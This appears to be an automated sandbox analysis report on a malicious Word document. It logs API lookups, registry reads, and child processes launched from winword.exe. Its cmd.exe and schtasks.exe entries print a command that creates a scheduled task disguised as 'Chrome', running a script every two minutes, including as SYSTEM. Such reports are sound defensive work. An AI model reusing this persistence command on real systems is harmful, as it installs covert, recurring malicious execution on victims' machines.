| Get Address | Unknown module name | function = MsoVBADigSigCallDlg, address_out = 0x7fee40b72c0 |
|
1 | |
| Get Address | Unknown module name | function = MsoVbaInitSecurity, address_out = 0x7fee40260b0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFIEPolicyAndVersion, address_out = 0x7fee3fd1a60 |
|
1 | |
| Get Address | Unknown module name | function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee4025f50 |
|
1 | |
| Get Address | Unknown module name | function = MsoFInitOffice, address_out = 0x7fee3fcf000 |
|
1 | |
| Get Address | Unknown module name | function = MsoUninitOffice, address_out = 0x7fee3fbe860 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetFontSettings, address_out = 0x7fee3fb3fc0 |
|
1 | |
| Get Address | Unknown module name | function = MsoRgchToRgwch, address_out = 0x7fee3fc2380 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrSimpleQueryInterface, address_out = 0x7fee3fb7b80 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrSimpleQueryInterface2, address_out = 0x7fee3fb7b20 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateControl, address_out = 0x7fee3fb8730 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLongLoad, address_out = 0x7fee40f3260 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLongSave, address_out = 0x7fee40f3280 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetTooltips, address_out = 0x7fee3fc1f40 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetTooltips, address_out = 0x7fee4026370 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLoadToolbarSet, address_out = 0x7fee4014590 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateToolbarSet, address_out = 0x7fee3fb55b0 |
|
1 | |
| Get Address | Unknown module name | function = MsoHpalOffice, address_out = 0x7fee3fc0240 |
|
1 | |
| Get Address | Unknown module name | function = MsoFWndProcNeeded, address_out = 0x7fee3fb3d10 |
|
1 | |
| Get Address | Unknown module name | function = MsoFWndProc, address_out = 0x7fee3fb6d30 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateITFCHwnd, address_out = 0x7fee3fb3d40 |
|
1 | |
| Get Address | Unknown module name | function = MsoDestroyITFC, address_out = 0x7fee3fbe6f0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee3fbdf40 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetComponentManager, address_out = 0x7fee3fb7bf0 |
|
1 | |
| Get Address | Unknown module name | function = MsoMultiByteToWideChar, address_out = 0x7fee3fbfcd0 |
|
1 | |
| Get Address | Unknown module name | function = MsoWideCharToMultiByte, address_out = 0x7fee3fb8b20 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrRegisterAll, address_out = 0x7fee40b2ef0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetComponentManager, address_out = 0x7fee3fc42c0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateStdComponentManager, address_out = 0x7fee3fb3e20 |
|
1 | |
| Get Address | Unknown module name | function = MsoFHandledMessageNeeded, address_out = 0x7fee3fbab10 |
|
1 | |
| Get Address | Unknown module name | function = MsoPeekMessage, address_out = 0x7fee3fba7d0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateIPref, address_out = 0x7fee3fb1550 |
|
1 | |
| Get Address | Unknown module name | function = MsoDestroyIPref, address_out = 0x7fee3fbe830 |
|
1 | |
| Get Address | Unknown module name | function = MsoChsFromLid, address_out = 0x7fee3fb13d0 |
|
1 | |
| Get Address | Unknown module name | function = MsoCpgFromChs, address_out = 0x7fee3fb6660 |
|
1 | |
| Get Address | Unknown module name | function = MsoSetLocale, address_out = 0x7fee3fb1500 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee3fb3dd0 |
|
1 | |
| Get Address | Unknown module name | function = MsoSetVbaInterfaces, address_out = 0x7fee40b71e0 |
|
1 | |
| Get Address | Unknown module name | function = MsoGetControlInstanceId, address_out = 0x7fee4086d10 |
|
1 | |
| Get Address | Unknown module name | function = VbeuiFIsEdpEnabled, address_out = 0x7fee40f98e0 |
|
1 | |
| Get Address | Unknown module name | function = VbeuiEnterpriseProtect, address_out = 0x7fee40f9830 |
|
1 | |
| Get Address | Unknown module name | function = SysFreeString, address_out = 0x7feffd81320 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLib, address_out = 0x7feffd8f1e0 |
|
1 | |
| Get Address | Unknown module name | function = RegisterTypeLib, address_out = 0x7feffddcaa0 |
|
1 | |
| Get Address | Unknown module name | function = QueryPathOfRegTypeLib, address_out = 0x7feffe11760 |
|
1 | |
| Get Address | Unknown module name | function = UnRegisterTypeLib, address_out = 0x7feffe120d0 |
|
2 | |
| Get Address | Unknown module name | function = OleTranslateColor, address_out = 0x7feffdac760 |
|
1 | |
| Get Address | Unknown module name | function = OleCreateFontIndirect, address_out = 0x7feffddecd0 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePictureIndirect, address_out = 0x7feffdde840 |
|
1 | |
| Get Address | Unknown module name | function = OleLoadPicture, address_out = 0x7feffdef420 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrameIndirect, address_out = 0x7feffde4ec0 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrame, address_out = 0x7feffde9350 |
|
1 | |
| Get Address | Unknown module name | function = OleIconToCursor, address_out = 0x7feffdb6e40 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLibEx, address_out = 0x7feffd8a550 |
|
2 | |
| Get Address | Unknown module name | function = OleLoadPictureEx, address_out = 0x7feffdef320 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetSystemMetrics, address_out = 0x77a394f0 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromWindow, address_out = 0x77a35f08 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromRect, address_out = 0x77a32b00 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromPoint, address_out = 0x77a2ab64 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = EnumDisplayMonitors, address_out = 0x77a35c30 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetMonitorInfoA, address_out = 0x77a2a730 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = EnumDisplayDevicesA, address_out = 0x77a2a5b4 |
|
1 | |
| Get Address | Unknown module name | function = DispCallFunc, address_out = 0x7feffd82270 |
|
1 | |
| Get Address | Unknown module name | function = CreateTypeLib2, address_out = 0x7feffe0dbd0 |
|
1 | |
| Get Address | Unknown module name | function = VarDateFromUdate, address_out = 0x7feffd85c90 |
|
1 | |
| Get Address | Unknown module name | function = VarUdateFromDate, address_out = 0x7feffd86330 |
|
1 | |
| Get Address | Unknown module name | function = GetAltMonthNames, address_out = 0x7feffda66c0 |
|
1 | |
| Get Address | Unknown module name | function = VarNumFromParseNum, address_out = 0x7feffd84710 |
|
1 | |
| Get Address | Unknown module name | function = VarParseNumFromStr, address_out = 0x7feffd848f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR4, address_out = 0x7feffdbb640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR8, address_out = 0x7feffdbb360 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromDate, address_out = 0x7feffdc2640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromI4, address_out = 0x7feffda58a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromCy, address_out = 0x7feffda5820 |
|
1 | |
| Get Address | Unknown module name | function = VarR4FromDec, address_out = 0x7feffdbaf20 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromTypeInfo, address_out = 0x7feffdda0c0 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromGuids, address_out = 0x7feffe12160 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetRecordInfo, address_out = 0x7feffda5af0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetRecordInfo, address_out = 0x7feffda5a90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetIID, address_out = 0x7feffda5a60 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetIID, address_out = 0x7feffda5a30 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCopyData, address_out = 0x7feffd860b0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayAllocDescriptorEx, address_out = 0x7feffd83e90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCreateEx, address_out = 0x7feffdd9f80 |
|
1 | |
| Get Address | Unknown module name | function = VarFormat, address_out = 0x7feffe09b20 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatDateTime, address_out = 0x7feffe09aa0 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatNumber, address_out = 0x7feffe09990 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatPercent, address_out = 0x7feffe09890 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatCurrency, address_out = 0x7feffe09770 |
|
1 | |
| Get Address | Unknown module name | function = VarWeekdayName, address_out = 0x7feffdeb8d0 |
|
1 | |
| Get Address | Unknown module name | function = VarMonthName, address_out = 0x7feffdeb800 |
|
1 | |
| Get Address | Unknown module name | function = VarAdd, address_out = 0x7feffe048e0 |
|
1 | |
| Get Address | Unknown module name | function = VarAnd, address_out = 0x7feffe09470 |
|
1 | |
| Get Address | Unknown module name | function = VarCat, address_out = 0x7feffe096a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDiv, address_out = 0x7feffe02fe0 |
|
1 | |
| Get Address | Unknown module name | function = VarEqv, address_out = 0x7feffe09cf0 |
|
1 | |
| Get Address | Unknown module name | function = VarIdiv, address_out = 0x7feffe08ff0 |
|
1 | |
| Get Address | Unknown module name | function = VarImp, address_out = 0x7feffe09c00 |
|
1 | |
| Get Address | Unknown module name | function = VarMod, address_out = 0x7feffe08e60 |
|
1 | |
| Get Address | Unknown module name | function = VarMul, address_out = 0x7feffe03690 |
|
1 | |
| Get Address | Unknown module name | function = VarOr, address_out = 0x7feffe092d0 |
|
1 | |
| Get Address | Unknown module name | function = VarPow, address_out = 0x7feffe02e80 |
|
1 | |
| Get Address | Unknown module name | function = VarSub, address_out = 0x7feffe03f90 |
|
1 | |
| Get Address | Unknown module name | function = VarXor, address_out = 0x7feffe091a0 |
|
1 | |
| Get Address | Unknown module name | function = VarAbs, address_out = 0x7feffde7c30 |
|
1 | |
| Get Address | Unknown module name | function = VarFix, address_out = 0x7feffde7a60 |
|
1 | |
| Get Address | Unknown module name | function = VarInt, address_out = 0x7feffde7890 |
|
1 | |
| Get Address | Unknown module name | function = VarNeg, address_out = 0x7feffde7ea0 |
|
1 | |
| Get Address | Unknown module name | function = VarNot, address_out = 0x7feffe09600 |
|
1 | |
| Get Address | Unknown module name | function = VarRound, address_out = 0x7feffde76a0 |
|
1 | |
| Get Address | Unknown module name | function = VarCmp, address_out = 0x7feffe083f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecAdd, address_out = 0x7feffdb3070 |
|
1 | |
| Get Address | Unknown module name | function = VarDecCmp, address_out = 0x7feffdbd700 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCat, address_out = 0x7feffdbd890 |
|
1 | |
| Get Address | Unknown module name | function = VarCyMulI4, address_out = 0x7feffd9caf0 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCmp, address_out = 0x7feffda8a00 |
|
1 | |
| Get Address | Unknown module name | address_out = 0x7fee3fbfcd0 |
|
1 | |
| Get Address | Unknown module name | function = 716, address_out = 0x7fee4ad24c8 |
|
3 | |
| Get Address | Unknown module name | function = 600, address_out = 0x7fee4894ee0 |
|
3 | |
| Get Address | Unknown module name | function = 617, address_out = 0x7fee48fd48c |
|
3 | |
| Get Address | Unknown module name | function = 668, address_out = 0x7fee4aa3344 |
|
3 | |
| Get Address | Unknown module name | function = 632, address_out = 0x7fee48fd6f0 |
|
3 | |
| Get Address | Unknown module name | function = 608, address_out = 0x7fee48fae28 |
|
3 | |
| Get Address | Unknown module name | function = DllDebugObjectRPCHook, address_out = 0x7feffbbafd0 |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = ThunderMain, wndproc_parameter = 0 |
|
1 |
System (21)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 1416, y_out = 740 |
|
2 | |
| Get Time | type = System Time, time = 2019-01-08 12:40:27 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 113085 |
|
1 | |
| Get Time | type = Local Time, time = 2019-01-08 12:40:30 (Local Time) |
|
2 | |
| Get Time | type = Local Time, time = 2019-01-08 12:40:31 (Local Time) |
|
11 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Operating System |
|
2 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = DDRYBUR |
|
1 |
Ini (5)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | Win.ini | section_name = windows, key_name = DragMinDist, default_value = 2, data_out = 2 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragDelay, default_value = 200, data_out = 200 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragScrollInset, default_value = 11, data_out = 11 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragScrollDelay, default_value = 50, data_out = 50 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragScrollInterval, default_value = 50, data_out = 50 |
|
1 |
Process #2: cmd.exe
68
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd /c schtasks /create /sc MINUTE /tn "Chrome" /tr "C:\Windows\Tasks\Chrome.js" /mo 2 /F & schtasks /create /sc MINUTE /tn "Chrome" /tr "C:\Windows\Tasks\Chrome.js" /mo 2 /RU SYSTEM |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:54, Reason: Child Process |
| Unmonitor | End Time: 00:00:57, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa34 |
| Parent PID | 0x8cc (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A38
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0011ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x004effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004f0000 | 0x004f0000 | 0x00677fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000680000 | 0x00680000 | 0x00800fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x01c0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c10000 | 0x01c10000 | 0x01f52fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01f60000 | 0x0222efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4a4c0000 | 0x4a518fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fef9350000 | 0x7fef9357fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\schtasks.exe | os_pid = 0xa4c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\schtasks.exe | os_pid = 0xa58, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4a4c0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77b20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77b36d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x77b323d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77b28290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x77b317e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-08 12:40:32 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 118170 |
|
1 |
Environment (27)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
10 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
3 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
3 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #3: schtasks.exe
19
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\schtasks.exe |
| Command Line | schtasks /create /sc MINUTE /tn "Chrome" /tr "C:\Windows\Tasks\Chrome.js" /mo 2 /F |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:55, Reason: Child Process |
| Unmonitor | End Time: 00:00:57, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa4c |
| Parent PID | 0xa34 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A50
0x
A54
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x000effff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x000f0000 | 0x00156fff | Memory Mapped File | r |
|
|
|
- |
| schtasks.exe.mui | 0x00160000 | 0x00171fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x0029ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x003a0000 | 0x0041cfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x003b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x0043ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x005c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x00750fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x01b5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01b60000 | 0x01e2efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001e30000 | 0x01e30000 | 0x01fdffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001e30000 | 0x01e30000 | 0x01f0efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001f60000 | 0x01f60000 | 0x01fdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002120000 | 0x02120000 | 0x0219ffff | Private Memory | rw |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| schtasks.exe | 0xffc70000 | 0xffcb7fff | Memory Mapped File | rwx |
|
|
|
- |
| ktmw32.dll | 0x7fef9440000 | 0x7fef9449fff | Memory Mapped File | rwx |
|
|
|
- |
| taskschd.dll | 0x7fefb8f0000 | 0x7fefba16fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7fefc040000 | 0x7fefc074fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefc4b0000 | 0x7fefc505fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7fefcd50000 | 0x7fefcd5bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7fefda50000 | 0x7fefda74fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefda80000 | 0x7fefda8efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
